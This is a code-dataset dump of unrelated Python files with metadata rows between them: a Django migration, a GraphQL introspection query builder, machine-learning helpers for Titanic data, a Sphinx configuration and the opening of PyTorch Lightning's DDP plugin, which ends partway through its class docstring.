from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('articles', '0002_report'),
]
operations = [
migrations.CreateModel(
name='ArticleRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', models.TextField()),
('rating', models.IntegerField()),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlerating', to='articles.Article')),
('rater', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlesrating', to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='articleratings',
name='article',
),
migrations.RemoveField(
model_name='articleratings',
name='rater',
),
migrations.DeleteModel(
name='ArticleRatings',
),
]
| 33.552632
| 150
| 0.607843
|
c7299c637ea4dc17f7beac2b8418db19371ed43a
| 3,021
|
py
|
Python
|
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | 1
|
2021-07-27T20:47:34.000Z
|
2021-07-27T20:47:34.000Z
|
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | null | null | null |
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | null | null | null |
from textwrap import dedent
__all__ = ["get_introspection_query"]
def get_introspection_query(
descriptions: bool = True,
specified_by_url: bool = False,
directive_is_repeatable: bool = False,
schema_description: bool = False,
) -> str:
"""Get a query for introspection.
Optionally, you can exclude descriptions, include specification URLs,
include repeatability of directives, and specify whether to include
the schema description as well.
"""
maybe_description = "description" if descriptions else ""
maybe_specified_by_url = "specifiedByUrl" if specified_by_url else ""
maybe_directive_is_repeatable = "isRepeatable" if directive_is_repeatable else ""
maybe_schema_description = maybe_description if schema_description else ""
return dedent(
f"""
query IntrospectionQuery {{
__schema {{
{maybe_schema_description}
queryType {{ name }}
mutationType {{ name }}
subscriptionType {{ name }}
types {{
...FullType
}}
directives {{
name
{maybe_description}
{maybe_directive_is_repeatable}
locations
args {{
...InputValue
}}
}}
}}
}}
fragment FullType on __Type {{
kind
name
{maybe_description}
{maybe_specified_by_url}
fields(includeDeprecated: true) {{
name
{maybe_description}
args {{
...InputValue
}}
type {{
...TypeRef
}}
isDeprecated
deprecationReason
}}
inputFields {{
...InputValue
}}
interfaces {{
...TypeRef
}}
enumValues(includeDeprecated: true) {{
name
{maybe_description}
isDeprecated
deprecationReason
}}
possibleTypes {{
...TypeRef
}}
}}
fragment InputValue on __InputValue {{
name
{maybe_description}
type {{ ...TypeRef }}
defaultValue
}}
fragment TypeRef on __Type {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
}}
}}
}}
}}
}}
}}
}}
}}
"""
)
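# Illustrative usage (a sketch, not part of the original module): print a compact
# introspection query without descriptions but with directive repeatability info.
if __name__ == "__main__":  # pragma: no cover
    print(get_introspection_query(descriptions=False, directive_is_repeatable=True))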
| 25.175
| 85
| 0.438265
|
6b84f803137196cc212dae9f55083afd5cfec7bd
| 265
|
py
|
Python
|
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
import pytest
from trickster.api_app import ApiApp
from trickster.config import Config
@pytest.fixture
def config():
return Config()
@pytest.fixture
def app(config):
return ApiApp(config)
@pytest.fixture
def client(app):
return app.test_client()
| 13.25
| 36
| 0.743396
|
4ba782ef9203a320ede7c1102479d5729fbaae73
| 7,878
|
py
|
Python
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 12
|
2019-07-06T09:06:17.000Z
|
2020-11-13T00:58:42.000Z
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 29
|
2019-07-01T14:19:49.000Z
|
2021-03-24T13:29:50.000Z
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 36
|
2019-07-05T15:53:35.000Z
|
2021-07-04T04:18:02.000Z
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import OneHotEncoder, RobustScaler
from sklearn.metrics import accuracy_score
categoricals = [
'PassengerId',
'Name',
'Ticket',
'Sex',
'Cabin',
'Embarked',
]
# Here are a few functions that we will use to do our proof of concepts
# around training and testing for kaggle submissions for the titanic
# competition.
# The reason that we need to have these functions the way they are
# is to manage the preprocessing of the features the same for the
# training and test set. Don't worry too much about exactly what's
# going on in these functions right now but rather focus on the concepts
# that are being covered after this in the notebook.
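# For example (illustration, not from the original notebook): if the training
# rows contain Embarked values {'S', 'C', 'Q'} but the held-out rows only contain
# {'S', 'C'}, calling pd.get_dummies() on each frame independently produces
# mismatched column sets, which is why produce_test_predictions() below rebuilds
# the test categoricals from the training categories before encoding.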
def read_and_get_dummies(drop_columns=[]):
# when working inside of functions, always call your dataframe
# _df so that you know you're never using any from the outside!
_df = pd.read_csv('data/titanic.csv')
# now drop any columns that are specified as needing to be dropped
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = _df[colname].fillna('null').astype('category')
# Split the factors and the target
X, y = _df.drop('Survived', axis=1), _df['Survived']
# take special note of this call!
X = pd.get_dummies(X, dummy_na=True).fillna(-1)
return _df, X, y
def encode_categoricals(drop_columns=[]):
# when working inside of functions, always call your dataframe
# _df so that you know you're never using any from the outside!
_df = pd.read_csv('data/titanic.csv')
# now drop any columns that are specified as needing to be dropped
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = pd.Categorical(_df[colname].fillna('null')).codes
if 'Age' in _df.columns:
_df['Age'] = _df['Age'].fillna(_df['Age'].mean())
# Split the factors and the target
X, y = _df.drop('Survived', axis=1), _df['Survived']
return _df, X, y
def train_and_test(drop_columns=[], max_depth=None, test_size=0.2, encode_cats=False):
"""
Train a decision tree and return the classifier, the X_train,
and the original dataframe so that they can be used on the test
set later on.
"""
if encode_cats:
_df, X, y = encode_categoricals(drop_columns=drop_columns)
else:
_df, X, y = read_and_get_dummies(drop_columns=drop_columns)
# Now let's get our train/test split
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=1, test_size=test_size)
clf = DecisionTreeClassifier(max_depth=max_depth, random_state=1)
clf.fit(X_train, y_train)
score = accuracy_score(y_test, clf.predict(X_test))
print('X_test accuracy {}'.format(score))
print('X_train shape: {}'.format(X_train.shape))
return X_train, _df, clf
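# Illustrative usage (a sketch, not from the original notebook):
#     X_train, train_df, clf = train_and_test(drop_columns=['Name', 'Ticket'], max_depth=4)
#     submission = produce_test_predictions(train_df, clf, drop_columns=['Name', 'Ticket'])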
def train_and_test_logit(drop_columns=[], test_size=0.2):
"""
    Train a logistic regression and return the classifier, the X_train,
and the original dataframe so that they can be used on the test
set later on. Features are scaled with RobustScaler. Does not
create dummies but rather encodes categoricals as integers.
"""
_df, X, y = encode_categoricals(drop_columns=drop_columns)
X = pd.DataFrame(RobustScaler().fit_transform(X), columns=X.columns)
# Now let's get our train/test split
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=1, test_size=test_size)
clf = LogisticRegression(random_state=1, solver='lbfgs', penalty='none')
clf.fit(X_train, y_train)
score = accuracy_score(y_test, clf.predict(X_test))
print('X_test accuracy {}'.format(score))
print('X_train shape: {}'.format(X_train.shape))
return X_train, _df, clf
def produce_test_predictions(train_df, clf, drop_columns=[]):
_df = pd.read_csv('data/titanic-test.csv')
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = _df[colname].fillna('null')
_df[colname] = pd.Categorical(
_df[colname],
categories=train_df[colname].cat.categories
)
X = pd.get_dummies(_df, dummy_na=True).fillna(-1)
return pd.DataFrame({
'PassengerId': pd.read_csv('data/titanic-test.csv').PassengerId,
'Survived': pd.Series(clf.predict(X))
})
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=3,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""
Generate a simple plot of the test and training learning curve.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
title : string
Title for the chart.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
ylim : tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if ``y`` is binary or multiclass,
        :class:`StratifiedKFold` is used. If the estimator is not a classifier
or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validators that can be used here.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
"""
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Test Set score")
plt.legend(loc="best")
return plt
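# Illustrative usage (a sketch; assumes data/titanic.csv is available as above):
#     _df, X, y = read_and_get_dummies()
#     plot_learning_curve(DecisionTreeClassifier(max_depth=3),
#                         "Decision tree learning curve", X, y, cv=3)
#     plt.show()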
# from sklearn import tree
# tree.export_graphviz(clf, out_file='tree.dot', feature_names=X_train.columns)
# ! dot -Tpng tree.dot -o tree.png
| 35.486486
| 86
| 0.675679
|
a448a96869d2205cdfb4cdf8c9b5cdc800e32870
| 1,854
|
py
|
Python
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 1
|
2019-08-01T00:28:24.000Z
|
2019-08-01T00:28:24.000Z
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 4
|
2018-08-31T14:14:35.000Z
|
2021-10-11T12:53:13.000Z
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 3
|
2018-08-31T14:11:00.000Z
|
2019-07-17T10:06:02.000Z
|
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2018 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.pezeshk_2011 import (PezeshkEtAl2011,
PezeshkEtAl2011NEHRPBC)
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
class Pezeshk2011EtAlTestCase(BaseGSIMTestCase):
GSIM_CLASS = PezeshkEtAl2011
# Test data were obtained from a tool given by the authors
# The data of the values of the mean PGA and SA are in g's.
def test_mean(self):
self.check('PEZE11/PZ11_MEAN.csv',
max_discrep_percentage=0.5)
def test_std_total(self):
self.check('PEZE11/PZ11_STD_TOTAL.csv',
max_discrep_percentage=0.5)
class Pezeshk2011NEHRPBCEtAlTestCase(BaseGSIMTestCase):
GSIM_CLASS = PezeshkEtAl2011NEHRPBC
# Test data generated by adjustment using Atkinson & Boore factors
def test_mean(self):
self.check('PEZE11/PZ11_NEHRPBC_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('PEZE11/PZ11_NEHRPBC_STD_TOTAL.csv',
max_discrep_percentage=0.1)
| 36.352941
| 74
| 0.70658
|
f954302ee30286eefa44a77cf8a43a2be480da2d
| 158
|
py
|
Python
|
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | null | null | null |
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | 2
|
2020-09-24T11:36:34.000Z
|
2020-09-30T14:17:53.000Z
|
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | 5
|
2020-09-21T13:21:08.000Z
|
2021-10-03T17:10:01.000Z
|
t = int(input())  # number of test cases
for _ in range(t):
    # Parse the space-separated integers for this case (a[0]..a[3] are used below).
    a = [int(x) for x in input().split(" ")]
    val = (a[0] - a[2] + a[3]) % a[1]
if val:
print("NO")
else:
print("YES")
| 15.8
| 41
| 0.487342
|
fe716e5e27839770bfdbce7c010bc27e2ac0cac3
| 767
|
py
|
Python
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | 1
|
2020-04-27T16:13:53.000Z
|
2020-04-27T16:13:53.000Z
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | 5
|
2020-06-05T23:42:26.000Z
|
2022-02-10T13:17:46.000Z
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
bio = models.CharField(max_length=250, default="Hey there,am on Insta", blank=True)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
def save_profile(self):
self.save()
def __str__(self):
return f'{self.user.username} Profile'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
        # Downscale large uploads so stored profile pictures stay at most 300x300 px.
        img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size)
img.save(self.image.path)
| 22.558824
| 87
| 0.647979
|
f30b0011e9a27c1dd89bd7d67f967247038adeb7
| 9,256
|
py
|
Python
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 209
|
2015-07-16T18:23:42.000Z
|
2022-02-27T02:59:46.000Z
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 74
|
2015-07-12T16:12:01.000Z
|
2022-02-22T14:27:26.000Z
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 112
|
2015-08-07T14:12:11.000Z
|
2022-02-10T14:12:50.000Z
|
# -*- coding: utf-8 -*-
#
# bruges documentation build configuration file, created by
# sphinx-quickstart on Thu Dec 12 16:14:28 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import re
import sys
import os
import sphinx_rtd_theme
import bruges
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../bruges'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinxcontrib.apidoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
'matplotlib.sphinxext.plot_directive',
]
# Autosummary pages will be generated by sphinx-autogen. Otherwise, the
# imported members won't be documented.
apidoc_module_dir = '../bruges'
apidoc_excluded_paths = ['tests']
apidoc_toc_file = 'api_toc'
apidoc_separate_modules = True
# Matplotlib Plot Directive
plot_include_source = True
plot_pre_code = "import bruges\nimport numpy as np\nimport matplotlib.pyplot as plt\n"
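# The two plot-directive settings above only control rendering; a docs page still
# has to embed a directive. Hedged, illustrative .rst snippet (it relies only on
# the np/plt imports injected by plot_pre_code, nothing bruges-specific):
#
#   .. plot::
#
#       t = np.linspace(0, 1, 500)
#       plt.plot(t, np.sin(2 * np.pi * 10 * t))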
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bruges'
copyright = u'2018, Agile Scientific'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
verstr = 'unknown'
VERSIONFILE = "../bruges/_version.py"
with open(VERSIONFILE, "r") as f:
verstrline = f.read().strip()
pattern = re.compile(r"__version__ = ['\"](.*)['\"]")
mo = pattern.search(verstrline)
if mo:
verstr = mo.group(1)
print("Version "+verstr)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
# The short X.Y version.
version = verstr[:3]
# The full version, including alpha/beta/rc tags.
release = verstr
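# For reference, the regex above expects ../bruges/_version.py to contain an
# assignment of the form (version number illustrative):
#   __version__ = '0.4.1'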
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'brugesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bruges.tex', u'bruges Documentation',
u'Evan Bianco, Ben Bougher, Matt Hall', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bruges', u'bruges Documentation',
[u'Evan Bianco, Ben Bougher, Matt Hall'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bruges', u'bruges Documentation',
u'Evan Bianco, Ben Bougher, Matt Hall', 'bruges', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 31.69863
| 88
| 0.718777
|
3341a39a2d50bb02f68bc28745b5a404f415e392
| 1,976
|
py
|
Python
|
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | 2
|
2018-09-13T11:37:28.000Z
|
2018-09-13T11:39:33.000Z
|
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | null | null | null |
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | 1
|
2018-09-13T11:37:31.000Z
|
2018-09-13T11:37:31.000Z
|
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import logging
import logging.config
from ..common import linux_shell
from ..common import file_handler
from ..common import directory_handler
from ..common import docker_handler
from ..common import template_handler
class image_tag:
def __init__(self, image_name, cluster_object_model, docker_cli):
self.logger = logging.getLogger(__name__)
self.cluster_object_model = cluster_object_model
self.image_name = image_name
self.tag = self.cluster_object_model['clusterinfo']['dockerregistryinfo']['docker_tag']
self.docker_cli = docker_cli
def image_tag(self):
self.logger.info("Tag the {0} to the registry".format(self.image_name))
self.docker_cli.image_tag_to_registry(
self.image_name,
self.tag
)
def run(self):
self.image_tag()
| 35.285714
| 128
| 0.748482
|
647ff764f7c89fd5cfc9365c73713971e19f3b64
| 21,412
|
py
|
Python
|
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import time
from pathlib import Path
from time import sleep
from typing import Any, Dict, List, Optional, Union
import __main__
import numpy as np
import torch
import torch.distributed
from torch.nn.parallel.distributed import DistributedDataParallel
import pytorch_lightning as pl
from pytorch_lightning.core.optimizer import LightningOptimizer
from pytorch_lightning.distributed import LightningDistributed
from pytorch_lightning.overrides import LightningDistributedModule
from pytorch_lightning.overrides.distributed import prepare_for_backward
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.parallel import ParallelPlugin
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import (
_FAIRSCALE_AVAILABLE,
_HYDRA_AVAILABLE,
_TORCH_GREATER_EQUAL_1_7,
_TORCH_GREATER_EQUAL_1_8,
_TORCH_GREATER_EQUAL_1_9,
_TORCH_GREATER_EQUAL_1_10,
rank_zero_deprecation,
rank_zero_warn,
)
from pytorch_lightning.utilities.distributed import (
distributed_available,
init_ddp_connection,
rank_zero_only,
ReduceOp,
sync_ddp_if_available,
)
from pytorch_lightning.utilities.exceptions import DeadlockDetectedException, MisconfigurationException
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import STEP_OUTPUT
if _TORCH_GREATER_EQUAL_1_10:
from torch.distributed.optim import DistributedOptimizer, PostLocalSGDOptimizer, ZeroRedundancyOptimizer
if _FAIRSCALE_AVAILABLE:
from fairscale.optim import OSS
if _HYDRA_AVAILABLE:
from hydra.core.hydra_config import HydraConfig
from hydra.utils import get_original_cwd, to_absolute_path
if _TORCH_GREATER_EQUAL_1_8:
from pytorch_lightning.utilities.distributed import register_ddp_comm_hook
if _TORCH_GREATER_EQUAL_1_10:
import torch.distributed.algorithms.ddp_comm_hooks.post_localSGD_hook as post_localSGD
import torch.distributed.algorithms.model_averaging.averagers as averagers
log = logging.getLogger(__name__)
class DDPPlugin(ParallelPlugin):
"""Plugin for multi-process single-device training on one or multiple nodes.
The master process in each node spawns N-1 child processes via :func:`subprocess.Popen`, where N is the number of
devices (e.g. GPU) per node. It is very similar to how :mod:`torch.distributed.launch` launches processes.
"""
